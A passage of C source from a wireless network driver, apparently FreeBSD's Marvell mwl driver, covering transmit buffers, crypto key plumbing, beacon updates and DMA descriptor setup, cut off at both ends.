mwl_hal_setrtsthreshold(hvap, vap->iv_rtsthreshold); /* XXX auto? 20/40 split? */ mwl_hal_sethtgi(hvap, (vap->iv_flags_ht & (IEEE80211_FHT_SHORTGI20|IEEE80211_FHT_SHORTGI40)) ? 1 : 0); mwl_hal_setnprot(hvap, ic->ic_htprotmode == IEEE80211_PROT_NONE ? HTPROTECT_NONE : HTPROTECT_AUTO); /* XXX txpower cap */ /* re-setup beacons */ if (state == IEEE80211_S_RUN && (vap->iv_opmode == IEEE80211_M_HOSTAP || vap->iv_opmode == IEEE80211_M_MBSS || vap->iv_opmode == IEEE80211_M_IBSS)) { mwl_setapmode(vap, vap->iv_bss->ni_chan); mwl_hal_setnprotmode(hvap, MS(ic->ic_curhtprotmode, IEEE80211_HTINFO_OPMODE)); return mwl_beacon_setup(vap); } return 0; } /* * Reset the hardware w/o losing operational state. * Used to to reset or reload hardware state for a vap. */ static int mwl_reset(struct ieee80211vap *vap, u_long cmd) { struct mwl_hal_vap *hvap = MWL_VAP(vap)->mv_hvap; int error = 0; if (hvap != NULL) { /* WDS, MONITOR, etc. */ struct ieee80211com *ic = vap->iv_ic; struct ifnet *ifp = ic->ic_ifp; struct mwl_softc *sc = ifp->if_softc; struct mwl_hal *mh = sc->sc_mh; /* XXX handle DWDS sta vap change */ /* XXX do we need to disable interrupts? */ mwl_hal_intrset(mh, 0); /* disable interrupts */ error = mwl_reset_vap(vap, vap->iv_state); mwl_hal_intrset(mh, sc->sc_imask); } return error; } /* * Allocate a tx buffer for sending a frame. The * packet is assumed to have the WME AC stored so * we can use it to select the appropriate h/w queue. */ static struct mwl_txbuf * mwl_gettxbuf(struct mwl_softc *sc, struct mwl_txq *txq) { struct mwl_txbuf *bf; /* * Grab a TX buffer and associated resources. */ MWL_TXQ_LOCK(txq); bf = STAILQ_FIRST(&txq->free); if (bf != NULL) { STAILQ_REMOVE_HEAD(&txq->free, bf_list); txq->nfree--; } MWL_TXQ_UNLOCK(txq); if (bf == NULL) DPRINTF(sc, MWL_DEBUG_XMIT, "%s: out of xmit buffers on q %d\n", __func__, txq->qnum); return bf; } /* * Return a tx buffer to the queue it came from. Note there * are two cases because we must preserve the order of buffers * as it reflects the fixed order of descriptors in memory * (the firmware pre-fetches descriptors so we cannot reorder). */ static void mwl_puttxbuf_head(struct mwl_txq *txq, struct mwl_txbuf *bf) { bf->bf_m = NULL; bf->bf_node = NULL; MWL_TXQ_LOCK(txq); STAILQ_INSERT_HEAD(&txq->free, bf, bf_list); txq->nfree++; MWL_TXQ_UNLOCK(txq); } static void mwl_puttxbuf_tail(struct mwl_txq *txq, struct mwl_txbuf *bf) { bf->bf_m = NULL; bf->bf_node = NULL; MWL_TXQ_LOCK(txq); STAILQ_INSERT_TAIL(&txq->free, bf, bf_list); txq->nfree++; MWL_TXQ_UNLOCK(txq); } static void mwl_start(struct ifnet *ifp) { struct mwl_softc *sc = ifp->if_softc; struct ieee80211_node *ni; struct mwl_txbuf *bf; struct mbuf *m; struct mwl_txq *txq = NULL; /* XXX silence gcc */ int nqueued; if ((ifp->if_drv_flags & IFF_DRV_RUNNING) == 0 || sc->sc_invalid) return; nqueued = 0; for (;;) { bf = NULL; IFQ_DEQUEUE(&ifp->if_snd, m); if (m == NULL) break; /* * Grab the node for the destination. */ ni = (struct ieee80211_node *) m->m_pkthdr.rcvif; KASSERT(ni != NULL, ("no node")); m->m_pkthdr.rcvif = NULL; /* committed, clear ref */ /* * Grab a TX buffer and associated resources. * We honor the classification by the 802.11 layer. */ txq = sc->sc_ac2q[M_WME_GETAC(m)]; bf = mwl_gettxbuf(sc, txq); if (bf == NULL) { m_freem(m); ieee80211_free_node(ni); #ifdef MWL_TX_NODROP sc->sc_stats.mst_tx_qstop++; /* XXX blocks other traffic */ ifp->if_drv_flags |= IFF_DRV_OACTIVE; break; #else DPRINTF(sc, MWL_DEBUG_XMIT, "%s: tail drop on q %d\n", __func__, txq->qnum); sc->sc_stats.mst_tx_qdrop++; continue; #endif /* MWL_TX_NODROP */ } /* * Pass the frame to the h/w for transmission. */ if (mwl_tx_start(sc, ni, bf, m)) { ifp->if_oerrors++; mwl_puttxbuf_head(txq, bf); ieee80211_free_node(ni); continue; } nqueued++; if (nqueued >= mwl_txcoalesce) { /* * Poke the firmware to process queued frames; * see below about (lack of) locking. */ nqueued = 0; mwl_hal_txstart(sc->sc_mh, 0/*XXX*/); } } if (nqueued) { /* * NB: We don't need to lock against tx done because * this just prods the firmware to check the transmit * descriptors. The firmware will also start fetching * descriptors by itself if it notices new ones are * present when it goes to deliver a tx done interrupt * to the host. So if we race with tx done processing * it's ok. Delivering the kick here rather than in * mwl_tx_start is an optimization to avoid poking the * firmware for each packet. * * NB: the queue id isn't used so 0 is ok. */ mwl_hal_txstart(sc->sc_mh, 0/*XXX*/); } } static int mwl_raw_xmit(struct ieee80211_node *ni, struct mbuf *m, const struct ieee80211_bpf_params *params) { struct ieee80211com *ic = ni->ni_ic; struct ifnet *ifp = ic->ic_ifp; struct mwl_softc *sc = ifp->if_softc; struct mwl_txbuf *bf; struct mwl_txq *txq; if ((ifp->if_drv_flags & IFF_DRV_RUNNING) == 0 || sc->sc_invalid) { ieee80211_free_node(ni); m_freem(m); return ENETDOWN; } /* * Grab a TX buffer and associated resources. * Note that we depend on the classification * by the 802.11 layer to get to the right h/w * queue. Management frames must ALWAYS go on * queue 1 but we cannot just force that here * because we may receive non-mgt frames. */ txq = sc->sc_ac2q[M_WME_GETAC(m)]; bf = mwl_gettxbuf(sc, txq); if (bf == NULL) { sc->sc_stats.mst_tx_qstop++; /* XXX blocks other traffic */ ifp->if_drv_flags |= IFF_DRV_OACTIVE; ieee80211_free_node(ni); m_freem(m); return ENOBUFS; } /* * Pass the frame to the h/w for transmission. */ if (mwl_tx_start(sc, ni, bf, m)) { ifp->if_oerrors++; mwl_puttxbuf_head(txq, bf); ieee80211_free_node(ni); return EIO; /* XXX */ } /* * NB: We don't need to lock against tx done because * this just prods the firmware to check the transmit * descriptors. The firmware will also start fetching * descriptors by itself if it notices new ones are * present when it goes to deliver a tx done interrupt * to the host. So if we race with tx done processing * it's ok. Delivering the kick here rather than in * mwl_tx_start is an optimization to avoid poking the * firmware for each packet. * * NB: the queue id isn't used so 0 is ok. */ mwl_hal_txstart(sc->sc_mh, 0/*XXX*/); return 0; } static int mwl_media_change(struct ifnet *ifp) { struct ieee80211vap *vap = ifp->if_softc; int error; error = ieee80211_media_change(ifp); /* NB: only the fixed rate can change and that doesn't need a reset */ if (error == ENETRESET) { mwl_setrates(vap); error = 0; } return error; } #ifdef MWL_DEBUG static void mwl_keyprint(struct mwl_softc *sc, const char *tag, const MWL_HAL_KEYVAL *hk, const uint8_t mac[IEEE80211_ADDR_LEN]) { static const char *ciphers[] = { "WEP", "TKIP", "AES-CCM", }; int i, n; printf("%s: [%u] %-7s", tag, hk->keyIndex, ciphers[hk->keyTypeId]); for (i = 0, n = hk->keyLen; i < n; i++) printf(" %02x", hk->key.aes[i]); printf(" mac %s", ether_sprintf(mac)); if (hk->keyTypeId == KEY_TYPE_ID_TKIP) { printf(" %s", "rxmic"); for (i = 0; i < sizeof(hk->key.tkip.rxMic); i++) printf(" %02x", hk->key.tkip.rxMic[i]); printf(" txmic"); for (i = 0; i < sizeof(hk->key.tkip.txMic); i++) printf(" %02x", hk->key.tkip.txMic[i]); } printf(" flags 0x%x\n", hk->keyFlags); } #endif /* * Allocate a key cache slot for a unicast key. The * firmware handles key allocation and every station is * guaranteed key space so we are always successful. */ static int mwl_key_alloc(struct ieee80211vap *vap, struct ieee80211_key *k, ieee80211_keyix *keyix, ieee80211_keyix *rxkeyix) { struct mwl_softc *sc = vap->iv_ic->ic_ifp->if_softc; if (k->wk_keyix != IEEE80211_KEYIX_NONE || (k->wk_flags & IEEE80211_KEY_GROUP)) { if (!(&vap->iv_nw_keys[0] <= k && k < &vap->iv_nw_keys[IEEE80211_WEP_NKID])) { /* should not happen */ DPRINTF(sc, MWL_DEBUG_KEYCACHE, "%s: bogus group key\n", __func__); return 0; } /* give the caller what they requested */ *keyix = *rxkeyix = k - vap->iv_nw_keys; } else { /* * Firmware handles key allocation. */ *keyix = *rxkeyix = 0; } return 1; } /* * Delete a key entry allocated by mwl_key_alloc. */ static int mwl_key_delete(struct ieee80211vap *vap, const struct ieee80211_key *k) { struct mwl_softc *sc = vap->iv_ic->ic_ifp->if_softc; struct mwl_hal_vap *hvap = MWL_VAP(vap)->mv_hvap; MWL_HAL_KEYVAL hk; const uint8_t bcastaddr[IEEE80211_ADDR_LEN] = { 0xff, 0xff, 0xff, 0xff, 0xff, 0xff }; if (hvap == NULL) { if (vap->iv_opmode != IEEE80211_M_WDS) { /* XXX monitor mode? */ DPRINTF(sc, MWL_DEBUG_KEYCACHE, "%s: no hvap for opmode %d\n", __func__, vap->iv_opmode); return 0; } hvap = MWL_VAP(vap)->mv_ap_hvap; } DPRINTF(sc, MWL_DEBUG_KEYCACHE, "%s: delete key %u\n", __func__, k->wk_keyix); memset(&hk, 0, sizeof(hk)); hk.keyIndex = k->wk_keyix; switch (k->wk_cipher->ic_cipher) { case IEEE80211_CIPHER_WEP: hk.keyTypeId = KEY_TYPE_ID_WEP; break; case IEEE80211_CIPHER_TKIP: hk.keyTypeId = KEY_TYPE_ID_TKIP; break; case IEEE80211_CIPHER_AES_CCM: hk.keyTypeId = KEY_TYPE_ID_AES; break; default: /* XXX should not happen */ DPRINTF(sc, MWL_DEBUG_KEYCACHE, "%s: unknown cipher %d\n", __func__, k->wk_cipher->ic_cipher); return 0; } return (mwl_hal_keyreset(hvap, &hk, bcastaddr) == 0); /*XXX*/ } static __inline int addgroupflags(MWL_HAL_KEYVAL *hk, const struct ieee80211_key *k) { if (k->wk_flags & IEEE80211_KEY_GROUP) { if (k->wk_flags & IEEE80211_KEY_XMIT) hk->keyFlags |= KEY_FLAG_TXGROUPKEY; if (k->wk_flags & IEEE80211_KEY_RECV) hk->keyFlags |= KEY_FLAG_RXGROUPKEY; return 1; } else return 0; } /* * Set the key cache contents for the specified key. Key cache * slot(s) must already have been allocated by mwl_key_alloc. */ static int mwl_key_set(struct ieee80211vap *vap, const struct ieee80211_key *k, const uint8_t mac[IEEE80211_ADDR_LEN]) { #define GRPXMIT (IEEE80211_KEY_XMIT | IEEE80211_KEY_GROUP) /* NB: static wep keys are marked GROUP+tx/rx; GTK will be tx or rx */ #define IEEE80211_IS_STATICKEY(k) \ (((k)->wk_flags & (GRPXMIT|IEEE80211_KEY_RECV)) == \ (GRPXMIT|IEEE80211_KEY_RECV)) struct mwl_softc *sc = vap->iv_ic->ic_ifp->if_softc; struct mwl_hal_vap *hvap = MWL_VAP(vap)->mv_hvap; const struct ieee80211_cipher *cip = k->wk_cipher; const uint8_t *macaddr; MWL_HAL_KEYVAL hk; KASSERT((k->wk_flags & IEEE80211_KEY_SWCRYPT) == 0, ("s/w crypto set?")); if (hvap == NULL) { if (vap->iv_opmode != IEEE80211_M_WDS) { /* XXX monitor mode? */ DPRINTF(sc, MWL_DEBUG_KEYCACHE, "%s: no hvap for opmode %d\n", __func__, vap->iv_opmode); return 0; } hvap = MWL_VAP(vap)->mv_ap_hvap; } memset(&hk, 0, sizeof(hk)); hk.keyIndex = k->wk_keyix; switch (cip->ic_cipher) { case IEEE80211_CIPHER_WEP: hk.keyTypeId = KEY_TYPE_ID_WEP; hk.keyLen = k->wk_keylen; if (k->wk_keyix == vap->iv_def_txkey) hk.keyFlags = KEY_FLAG_WEP_TXKEY; if (!IEEE80211_IS_STATICKEY(k)) { /* NB: WEP is never used for the PTK */ (void) addgroupflags(&hk, k); } break; case IEEE80211_CIPHER_TKIP: hk.keyTypeId = KEY_TYPE_ID_TKIP; hk.key.tkip.tsc.high = (uint32_t)(k->wk_keytsc >> 16); hk.key.tkip.tsc.low = (uint16_t)k->wk_keytsc; hk.keyFlags = KEY_FLAG_TSC_VALID | KEY_FLAG_MICKEY_VALID; hk.keyLen = k->wk_keylen + IEEE80211_MICBUF_SIZE; if (!addgroupflags(&hk, k)) hk.keyFlags |= KEY_FLAG_PAIRWISE; break; case IEEE80211_CIPHER_AES_CCM: hk.keyTypeId = KEY_TYPE_ID_AES; hk.keyLen = k->wk_keylen; if (!addgroupflags(&hk, k)) hk.keyFlags |= KEY_FLAG_PAIRWISE; break; default: /* XXX should not happen */ DPRINTF(sc, MWL_DEBUG_KEYCACHE, "%s: unknown cipher %d\n", __func__, k->wk_cipher->ic_cipher); return 0; } /* * NB: tkip mic keys get copied here too; the layout * just happens to match that in ieee80211_key. */ memcpy(hk.key.aes, k->wk_key, hk.keyLen); /* * Locate address of sta db entry for writing key; * the convention unfortunately is somewhat different * than how net80211, hostapd, and wpa_supplicant think. */ if (vap->iv_opmode == IEEE80211_M_STA) { /* * NB: keys plumbed before the sta reaches AUTH state * will be discarded or written to the wrong sta db * entry because iv_bss is meaningless. This is ok * (right now) because we handle deferred plumbing of * WEP keys when the sta reaches AUTH state. */ macaddr = vap->iv_bss->ni_bssid; if ((k->wk_flags & IEEE80211_KEY_GROUP) == 0) { /* XXX plumb to local sta db too for static key wep */ mwl_hal_keyset(hvap, &hk, vap->iv_myaddr); } } else if (vap->iv_opmode == IEEE80211_M_WDS && vap->iv_state != IEEE80211_S_RUN) { /* * Prior to RUN state a WDS vap will not it's BSS node * setup so we will plumb the key to the wrong mac * address (it'll be our local address). Workaround * this for the moment by grabbing the correct address. */ macaddr = vap->iv_des_bssid; } else if ((k->wk_flags & GRPXMIT) == GRPXMIT) macaddr = vap->iv_myaddr; else macaddr = mac; KEYPRINTF(sc, &hk, macaddr); return (mwl_hal_keyset(hvap, &hk, macaddr) == 0); #undef IEEE80211_IS_STATICKEY #undef GRPXMIT } /* unaligned little endian access */ #define LE_READ_2(p) \ ((uint16_t) \ ((((const uint8_t *)(p))[0] ) | \ (((const uint8_t *)(p))[1] << 8))) #define LE_READ_4(p) \ ((uint32_t) \ ((((const uint8_t *)(p))[0] ) | \ (((const uint8_t *)(p))[1] << 8) | \ (((const uint8_t *)(p))[2] << 16) | \ (((const uint8_t *)(p))[3] << 24))) /* * Set the multicast filter contents into the hardware. * XXX f/w has no support; just defer to the os. */ static void mwl_setmcastfilter(struct mwl_softc *sc) { struct ifnet *ifp = sc->sc_ifp; #if 0 struct ether_multi *enm; struct ether_multistep estep; uint8_t macs[IEEE80211_ADDR_LEN*MWL_HAL_MCAST_MAX];/* XXX stack use */ uint8_t *mp; int nmc; mp = macs; nmc = 0; ETHER_FIRST_MULTI(estep, &sc->sc_ec, enm); while (enm != NULL) { /* XXX Punt on ranges. */ if (nmc == MWL_HAL_MCAST_MAX || !IEEE80211_ADDR_EQ(enm->enm_addrlo, enm->enm_addrhi)) { ifp->if_flags |= IFF_ALLMULTI; return; } IEEE80211_ADDR_COPY(mp, enm->enm_addrlo); mp += IEEE80211_ADDR_LEN, nmc++; ETHER_NEXT_MULTI(estep, enm); } ifp->if_flags &= ~IFF_ALLMULTI; mwl_hal_setmcast(sc->sc_mh, nmc, macs); #else /* XXX no mcast filter support; we get everything */ ifp->if_flags |= IFF_ALLMULTI; #endif } static int mwl_mode_init(struct mwl_softc *sc) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct mwl_hal *mh = sc->sc_mh; /* * NB: Ignore promisc in hostap mode; it's set by the * bridge. This is wrong but we have no way to * identify internal requests (from the bridge) * versus external requests such as for tcpdump. */ mwl_hal_setpromisc(mh, (ifp->if_flags & IFF_PROMISC) && ic->ic_opmode != IEEE80211_M_HOSTAP); mwl_setmcastfilter(sc); return 0; } /* * Callback from the 802.11 layer after a multicast state change. */ static void mwl_update_mcast(struct ifnet *ifp) { struct mwl_softc *sc = ifp->if_softc; mwl_setmcastfilter(sc); } /* * Callback from the 802.11 layer after a promiscuous mode change. * Note this interface does not check the operating mode as this * is an internal callback and we are expected to honor the current * state (e.g. this is used for setting the interface in promiscuous * mode when operating in hostap mode to do ACS). */ static void mwl_update_promisc(struct ifnet *ifp) { struct mwl_softc *sc = ifp->if_softc; mwl_hal_setpromisc(sc->sc_mh, (ifp->if_flags & IFF_PROMISC) != 0); } /* * Callback from the 802.11 layer to update the slot time * based on the current setting. We use it to notify the * firmware of ERP changes and the f/w takes care of things * like slot time and preamble. */ static void mwl_updateslot(struct ifnet *ifp) { struct mwl_softc *sc = ifp->if_softc; struct ieee80211com *ic = ifp->if_l2com; struct mwl_hal *mh = sc->sc_mh; int prot; /* NB: can be called early; suppress needless cmds */ if ((ifp->if_drv_flags & IFF_DRV_RUNNING) == 0) return; /* * Calculate the ERP flags. The firwmare will use * this to carry out the appropriate measures. */ prot = 0; if (IEEE80211_IS_CHAN_ANYG(ic->ic_curchan)) { if ((ic->ic_flags & IEEE80211_F_SHSLOT) == 0) prot |= IEEE80211_ERP_NON_ERP_PRESENT; if (ic->ic_flags & IEEE80211_F_USEPROT) prot |= IEEE80211_ERP_USE_PROTECTION; if (ic->ic_flags & IEEE80211_F_USEBARKER) prot |= IEEE80211_ERP_LONG_PREAMBLE; } DPRINTF(sc, MWL_DEBUG_RESET, "%s: chan %u MHz/flags 0x%x %s slot, (prot 0x%x ic_flags 0x%x)\n", __func__, ic->ic_curchan->ic_freq, ic->ic_curchan->ic_flags, ic->ic_flags & IEEE80211_F_SHSLOT ? "short" : "long", prot, ic->ic_flags); mwl_hal_setgprot(mh, prot); } /* * Setup the beacon frame. */ static int mwl_beacon_setup(struct ieee80211vap *vap) { struct mwl_hal_vap *hvap = MWL_VAP(vap)->mv_hvap; struct ieee80211_node *ni = vap->iv_bss; struct ieee80211_beacon_offsets bo; struct mbuf *m; m = ieee80211_beacon_alloc(ni, &bo); if (m == NULL) return ENOBUFS; mwl_hal_setbeacon(hvap, mtod(m, const void *), m->m_len); m_free(m); return 0; } /* * Update the beacon frame in response to a change. */ static void mwl_beacon_update(struct ieee80211vap *vap, int item) { struct mwl_hal_vap *hvap = MWL_VAP(vap)->mv_hvap; struct ieee80211com *ic = vap->iv_ic; KASSERT(hvap != NULL, ("no beacon")); switch (item) { case IEEE80211_BEACON_ERP: mwl_updateslot(ic->ic_ifp); break; case IEEE80211_BEACON_HTINFO: mwl_hal_setnprotmode(hvap, MS(ic->ic_curhtprotmode, IEEE80211_HTINFO_OPMODE)); break; case IEEE80211_BEACON_CAPS: case IEEE80211_BEACON_WME: case IEEE80211_BEACON_APPIE: case IEEE80211_BEACON_CSA: break; case IEEE80211_BEACON_TIM: /* NB: firmware always forms TIM */ return; } /* XXX retain beacon frame and update */ mwl_beacon_setup(vap); } static void mwl_load_cb(void *arg, bus_dma_segment_t *segs, int nsegs, int error) { bus_addr_t *paddr = (bus_addr_t*) arg; KASSERT(error == 0, ("error %u on bus_dma callback", error)); *paddr = segs->ds_addr; } #ifdef MWL_HOST_PS_SUPPORT /* * Handle power save station occupancy changes. */ static void mwl_update_ps(struct ieee80211vap *vap, int nsta) { struct mwl_vap *mvp = MWL_VAP(vap); if (nsta == 0 || mvp->mv_last_ps_sta == 0) mwl_hal_setpowersave_bss(mvp->mv_hvap, nsta); mvp->mv_last_ps_sta = nsta; } /* * Handle associated station power save state changes. */ static int mwl_set_tim(struct ieee80211_node *ni, int set) { struct ieee80211vap *vap = ni->ni_vap; struct mwl_vap *mvp = MWL_VAP(vap); if (mvp->mv_set_tim(ni, set)) { /* NB: state change */ mwl_hal_setpowersave_sta(mvp->mv_hvap, IEEE80211_AID(ni->ni_associd), set); return 1; } else return 0; } #endif /* MWL_HOST_PS_SUPPORT */ static int mwl_desc_setup(struct mwl_softc *sc, const char *name, struct mwl_descdma *dd, int nbuf, size_t bufsize, int ndesc, size_t descsize) { struct ifnet *ifp = sc->sc_ifp; uint8_t *ds; int error; DPRINTF(sc, MWL_DEBUG_RESET, "%s: %s DMA: %u bufs (%ju) %u desc/buf (%ju)\n", __func__, name, nbuf, (uintmax_t) bufsize, ndesc, (uintmax_t) descsize); dd->dd_name = name; dd->dd_desc_len = nbuf * ndesc * descsize; /* * Setup DMA descriptor area. */ error = bus_dma_tag_create(bus_get_dma_tag(sc->sc_dev), /* parent */ PAGE_SIZE, 0, /* alignment, bounds */ BUS_SPACE_MAXADDR_32BIT, /* lowaddr */ BUS_SPACE_MAXADDR, /* highaddr */ NULL, NULL, /* filter, filterarg */ dd->dd_desc_len, /* maxsize */ 1, /* nsegments */ dd->dd_desc_len, /* maxsegsize */ BUS_DMA_ALLOCNOW, /* flags */ NULL, /* lockfunc */ NULL, /* lockarg */ &dd->dd_dmat); if (error != 0) { if_printf(ifp, "cannot allocate %s DMA tag\n", dd->dd_name); return error; } /* allocate descriptors */ error = bus_dmamap_create(dd->dd_dmat, BUS_DMA_NOWAIT, &dd->dd_dmamap); if (error != 0) { if_printf(ifp, "unable to create dmamap for %s descriptors, " "error %u\n", dd->dd_name, error); goto fail0; } error = bus_dmamem_alloc(dd->dd_dmat, (void**) &dd->dd_desc, BUS_DMA_NOWAIT | BUS_DMA_COHERENT, &dd->dd_dmamap); if (error != 0) { if_printf(ifp, "unable to alloc memory for %u %s descriptors, " "error %u\n", nbuf * ndesc, dd->dd_name, error); goto fail1; } error = bus_dmamap_load(dd->dd_dmat, dd->dd_dmamap, dd->dd_desc, dd->dd_desc_len, mwl_load_cb, &dd->dd_desc_paddr, BUS_DMA_NOWAIT); if (error != 0) { if_printf(ifp, "unable to map %s descriptors, error %u\n", dd->dd_name, error); goto fail2; } ds = dd->dd_desc; memset(ds, 0, dd->dd_desc_len); DPRINTF(sc, MWL_DEBUG_RESET, "%s: %s DMA map: %p (%lu) -> %p (%lu)\n", __func__, dd->dd_name, ds, (u_long) dd->dd_desc_len, (caddr_t) dd->dd_desc_paddr, /*XXX*/ (u_long) dd->dd_desc_len); return 0; fail2: bus_dmamem_free(dd->dd_dmat, dd->dd_desc, dd->dd_dmamap); fail1: bus_dmamap_destroy(dd->dd_dmat, dd->dd_dmamap); fail0: bus_dma_tag_destroy(dd->dd_dmat); memset(dd, 0, sizeof(*dd)); return error; #undef DS2PHYS } static void mwl_desc_cleanup(struct mwl_softc *sc, struct mwl_descdma *dd) { bus_dmamap_unload(dd->dd_dmat, dd->dd_dmamap); bus_dmamem_free(dd->dd_dmat, dd->dd_desc, dd->dd_dmamap); bus_dmamap_destroy(dd->dd_dmat, dd->dd_dmamap); bus_dma_tag_destroy(dd->dd_dmat); memset(dd, 0, sizeof(*dd)); } /* * Construct a tx q's free list. The order of entries on * the list must reflect the physical layout of tx descriptors * because the firmware pre-fetches descriptors. * * XXX might be better to use indices into the buffer array. */ static void mwl_txq_reset(struct mwl_softc *sc, struct mwl_txq *txq) { struct mwl_txbuf *bf; int i; bf = txq->dma.dd_bufptr; STAILQ_INIT(&txq->free); for (i = 0; i < mwl_txbuf; i++, bf++) STAILQ_INSERT_TAIL(&txq->free, bf, bf_list); txq->nfree = i; } #define DS2PHYS(_dd, _ds) \ ((_dd)->dd_desc_paddr + ((caddr_t)(_ds) - (caddr_t)(_dd)->dd_desc)) static int mwl_txdma_setup(struct mwl_softc *sc, struct mwl_txq *txq) { struct ifnet *ifp = sc->sc_ifp; int error, bsize, i; struct mwl_txbuf *bf; struct mwl_txdesc *ds; error = mwl_desc_setup(sc, "tx", &txq->dma, mwl_txbuf, sizeof(struct mwl_txbuf), MWL_TXDESC, sizeof(struct mwl_txdesc)); if (error != 0) return error; /* allocate and setup tx buffers */ bsize = mwl_txbuf * sizeof(struct mwl_txbuf); bf = malloc(bsize, M_MWLDEV, M_NOWAIT | M_ZERO); if (bf == NULL) { if_printf(ifp, "malloc of %u tx buffers failed\n", mwl_txbuf); return ENOMEM; } txq->dma.dd_bufptr = bf; ds = txq->dma.dd_desc; for (i = 0; i < mwl_txbuf; i++, bf++, ds += MWL_TXDESC) { bf->bf_desc = ds; bf->bf_daddr = DS2PHYS(&txq->dma, ds); error = bus_dmamap_create(sc->sc_dmat, BUS_DMA_NOWAIT, &bf->bf_dmamap); if (error != 0) { if_printf(ifp, "unable to create dmamap for tx " "buffer %u, error %u\n", i, error); return error; } } mwl_txq_reset(sc, txq); return 0; } static void mwl_txdma_cleanup(struct mwl_softc *sc, struct mwl_txq *txq) { struct mwl_txbuf *bf; int i; bf = txq->dma.dd_bufptr; for (i = 0; i < mwl_txbuf; i++, bf++) { KASSERT(bf->bf_m == NULL, ("mbuf on free list")); KASSERT(bf->bf_node == NULL, ("node on free list")); if (bf->bf_dmamap != NULL) bus_dmamap_destroy(sc->sc_dmat, bf->bf_dmamap); } STAILQ_INIT(&txq->free); txq->nfree = 0; if (txq->dma.dd_bufptr != NULL) { free(txq->dma.dd_bufptr, M_MWLDEV); txq->dma.dd_bufptr = NULL; } if (txq->dma.dd_desc_len != 0) mwl_desc_cleanup(sc, &txq->dma); } static int mwl_rxdma_setup(struct mwl_softc *sc) { struct ifnet *ifp = sc->sc_ifp; int error, jumbosize, bsize, i; struct mwl_rxbuf *bf; struct mwl_jumbo *rbuf; struct mwl_rxdesc *ds; caddr_t data; error = mwl_desc_setup(sc, "rx", &sc->sc_rxdma, mwl_rxdesc, sizeof(struct mwl_rxbuf), 1, sizeof(struct mwl_rxdesc)); if (error != 0) return error; /* * Receive is done to a private pool of jumbo buffers. * This allows us to attach to mbuf's and avoid re-mapping * memory on each rx we post. We allocate a large chunk * of memory and manage it in the driver. The mbuf free * callback method is used to reclaim frames after sending * them up the stack. By default we allocate 2x the number of * rx descriptors configured so we have some slop to hold * us while frames are processed. */ if (mwl_rxbuf < 2*mwl_rxdesc) { if_printf(ifp, "too few rx dma buffers (%d); increasing to %d\n", mwl_rxbuf, 2*mwl_rxdesc); mwl_rxbuf = 2*mwl_rxdesc; } jumbosize = roundup(MWL_AGGR_SIZE, PAGE_SIZE); sc->sc_rxmemsize = mwl_rxbuf*jumbosize; error = bus_dma_tag_create(sc->sc_dmat, /* parent */ PAGE_SIZE, 0, /* alignment, bounds */ BUS_SPACE_MAXADDR_32BIT, /* lowaddr */ BUS_SPACE_MAXADDR, /* highaddr */ NULL, NULL, /* filter, filterarg */ sc->sc_rxmemsize, /* maxsize */ 1, /* nsegments */ sc->sc_rxmemsize, /* maxsegsize */ BUS_DMA_ALLOCNOW, /* flags */ NULL, /* lockfunc */ NULL, /* lockarg */ &sc->sc_rxdmat); error = bus_dmamap_create(sc->sc_rxdmat, BUS_DMA_NOWAIT, &sc->sc_rxmap); if (error != 0) { if_printf(ifp, "could not create rx DMA map\n"); return error; } error = bus_dmamem_alloc(sc->sc_rxdmat, (void**) &sc->sc_rxmem, BUS_DMA_NOWAIT | BUS_DMA_COHERENT, &sc->sc_rxmap); if (error != 0) { if_printf(ifp, "could not alloc %ju bytes of rx DMA memory\n", (uintmax_t) sc->sc_rxmemsize); return error; } error = bus_dmamap_load(sc->sc_rxdmat, sc->sc_rxmap, sc->sc_rxmem, sc->sc_rxmemsize, mwl_load_cb, &sc->sc_rxmem_paddr, BUS_DMA_NOWAIT); if (error != 0) { if_printf(ifp, "could not load rx DMA map\n"); return error; } /* * Allocate rx buffers and set them up. */ bsize = mwl_rxdesc * sizeof(struct mwl_rxbuf); bf = malloc(bsize, M_MWLDEV, M_NOWAIT | M_ZERO); if (bf == NULL) { if_printf(ifp, "malloc of %u rx buffers failed\n", bsize); return error; } sc->sc_rxdma.dd_bufptr = bf; STAILQ_INIT(&sc->sc_rxbuf); ds = sc->sc_rxdma.dd_desc; for (i = 0; i < mwl_rxdesc; i++, bf++, ds++) { bf->bf_desc = ds; bf->bf_daddr = DS2PHYS(&sc->sc_rxdma, ds); /* pre-assign dma buffer */ bf->bf_data = ((uint8_t *)sc->sc_rxmem) + (i*jumbosize); /* NB: tail is intentional to preserve descriptor order */ STAILQ_INSERT_TAIL(&sc->sc_rxbuf, bf, bf_list); } /* * Place remainder of dma memory buffers on the free list. */ SLIST_INIT(&sc->sc_rxfree); for (; i < mwl_rxbuf; i++) { data = ((uint8_t *)sc->sc_rxmem) + (i*jumbosize); rbuf = MWL_JUMBO_DATA2BUF(data); SLIST_INSERT_HEAD(&sc->sc_rxfree, rbuf, next); sc->sc_nrxfree++; } return 0; } #undef DS2PHYS static void mwl_rxdma_cleanup(struct mwl_softc *sc) { if (sc->sc_rxmap != NULL) bus_dmamap_unload(sc->sc_rxdmat, sc->sc_rxmap); if (sc->sc_rxmem != NULL) { bus_dmamem_free(sc->sc_rxdmat, sc->sc_rxmem, sc->sc_rxmap); sc->sc_rxmem = NULL; } if (sc->sc_rxmap != NULL) { bus_dmamap_destroy(sc->sc_rxdmat, sc->sc_rxmap); sc->sc_rxmap = NULL; } if (sc->sc_rxdma.dd_bufptr != NULL) { free(sc->sc_rxdma.dd_bufptr, M_MWLDEV); sc->sc_rxdma.dd_bufptr = NULL; } if (sc->sc_rxdma.dd_desc_len != 0) mwl_desc_cleanup(sc, &sc->sc_rxdma); } static int mwl_dma_setup(struct mwl_softc *sc) { int error, i; error = mwl_rxdma_setup(sc); if (error != 0) { mwl_rxdma_cleanup(sc); return error; } for (i = 0; i < MWL_NUM_TX_QUEUES; i++) { error = mwl_txdma_setup(sc, &sc->sc_txq[i]); if (error != 0) { mwl_dma_cleanup(sc); return error; } } return 0; } static void mwl_dma_cleanup(struct mwl_softc *sc) { int i; for (i = 0; i < MWL_NUM_TX_QUEUES; i++) mwl_txdma_cleanup(sc, &sc->sc_txq[i]); mwl_rxdma_cleanup(sc); } static struct ieee80211_node * mwl_node_alloc(struct ieee80211vap *vap, const uint8_t mac[IEEE80211_ADDR_LEN]) { struct ieee80211com *ic = vap->iv_ic; struct mwl_softc *sc = ic->ic_ifp->if_softc; const size_t space = sizeof(struct mwl_node); struct mwl_node *mn; mn = malloc(space, 